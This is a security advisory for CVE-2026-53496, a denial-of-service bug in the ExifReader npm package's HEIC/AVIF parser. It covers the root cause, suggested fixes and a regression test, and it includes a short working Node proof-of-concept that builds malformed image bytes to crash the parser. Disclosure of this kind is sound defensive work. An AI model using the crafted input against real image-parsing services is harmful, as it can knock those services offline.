PT-2026-60891 · Npm · Exifreader
CVE-2026-53496
·
Publicado
2026-07-17
·
Atualizado
2026-07-17
CVSS v3.1
5.3
Média
| Vetor | AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L |
Summary
ExifReader 4.40.0 can throw an uncaught
RangeError: Offset is outside the bounds of the DataView while parsing crafted HEIC/AVIF files. The file only needs a valid leading ftyp box with a HEIC/AVIF major brand followed by a malformed ISO-BMFF box, such as an empty 8-byte free box or a truncated extended-size box.This is reachable through the public
ExifReader.load() API for in-memory buffers and through the async file/URL loaders when an application parses attacker-supplied images. In applications that do not wrap every parse in a defensive try/catch, a single uploaded or fetched image can abort the request/worker and cause a denial of service.Credit requested: Yaohui Wang.
Affected version tested
- npm package:
exifreader - Version:
4.40.0 - Repository commit tested:
8cb0261a26b7d986955fe0a6780f076dcb7902e7
Root cause
The ISO-BMFF parser assumes that every top-level box with at least an 8-byte header also has enough bytes for the fields required by its parsed form. In
src/image-header-iso-bmff.js:findMetaBox()callsparseBox(dataView, offset)while only checking thatoffset + 8 <= dataView.byteLength.parseBox()callsgetBoxLength()and then unconditionally reads fields such as the full-box version byte formeta/iloc/iinf/idatboxes.getBoxLength()handlesboxLength === 1by callinghasEmptyHighBits(dataView, offset), which readsdataView.getUint32(offset + 8)without first checking that the 64-bit extended size field is present.
As a result, syntactically small or truncated boxes after a valid HEIC/AVIF
ftyp box escape the format-detection catch blocks and throw from the main parsing path.Reproduction
Run this from the repository root against the committed
dist/exif-reader.js bundle:js
const ExifReader = require('./dist/exif-reader.js');
function u32be(n) {
return [(n >>> 24) & 255, (n >>> 16) & 255, (n >>> 8) & 255, n & 255];
}
function ascii(s) {
return Array.from(Buffer.from(s, 'ascii'));
}
function box(type, content = []) {
return [...u32be(8 + content.length), ...ascii(type), ...content];
}
for (const brand of ['heic', 'avif']) {
for (const badBox of ['free', 'abcd']) {
const bytes = Uint8Array.from([
...box('ftyp', ascii(brand)),
...box(badBox), // 8-byte box header with no content
]);
try {
ExifReader.load(bytes.buffer);
console.log(`${brand}/${badBox}: no throw`);
} catch (e) {
console.log(`${brand}/${badBox}: ${e.name}: ${e.message}`);
console.log(String(e.stack).split('
').slice(0, 6).join('
'));
}
}
}Observed output on Node v23.11.0 with ExifReader 4.40.0:
text
heic/free: RangeError: Offset is outside the bounds of the DataView
RangeError: Offset is outside the bounds of the DataView
at DataView.prototype.getUint8 (<anonymous>)
at parseBox (.../dist/exif-reader.js:1:16513)
at findMetaBox (.../dist/exif-reader.js:1:19032)
at findOffsets (.../dist/exif-reader.js:1:19101)
heic/abcd: RangeError: Offset is outside the bounds of the DataView
avif/free: RangeError: Offset is outside the bounds of the DataView
avif/abcd: RangeError: Offset is outside the bounds of the DataViewA second variant triggers the extended-size path:
js
const truncatedExtendedBox = [...u32be(1), ...ascii('free')];
const heic = Uint8Array.from([...box('ftyp', ascii('heic')), ...truncatedExtendedBox]);
ExifReader.load(heic.buffer);That throws from
hasEmptyHighBits() / getBoxLength() because the extended-size high/low fields are not present.Expected behavior
Malformed/truncated metadata boxes should be handled like other malformed metadata in the project: return only the successfully parsed file type/metadata, return no app markers, or throw a controlled project-specific error. A safe JavaScript bounds error should not escape from the parser for an attacker-controlled image container.
Security impact
This is a denial-of-service issue for services that parse user-provided HEIC/AVIF files with ExifReader. A minimal attacker-controlled image buffer can cause an unhandled exception in the parser and abort the surrounding request/worker if the embedding application does not catch every parse error.
Suggested severity: Medium. Suggested CVSS:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L.Suggested fix
Add explicit bounds checks before every
DataView read in the ISO-BMFF box parser, especially:- before reading the 64-bit extended size fields in
getBoxLength(); - before reading the full-box version byte in
parseBox(); - before descending into
parseSubBoxes()when a declared box length exceeds available bytes; - ensure
findMetaBox()breaks on boxes whose declared length is invalid or not fully present.
A regression test should cover
ftyp/heic and ftyp/avif followed by an 8-byte empty free/unknown box and by a truncated extended-size box.Correção
Improper Handling of Exceptional Conditions
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Identificadores relacionados
Produtos afetados
Exifreader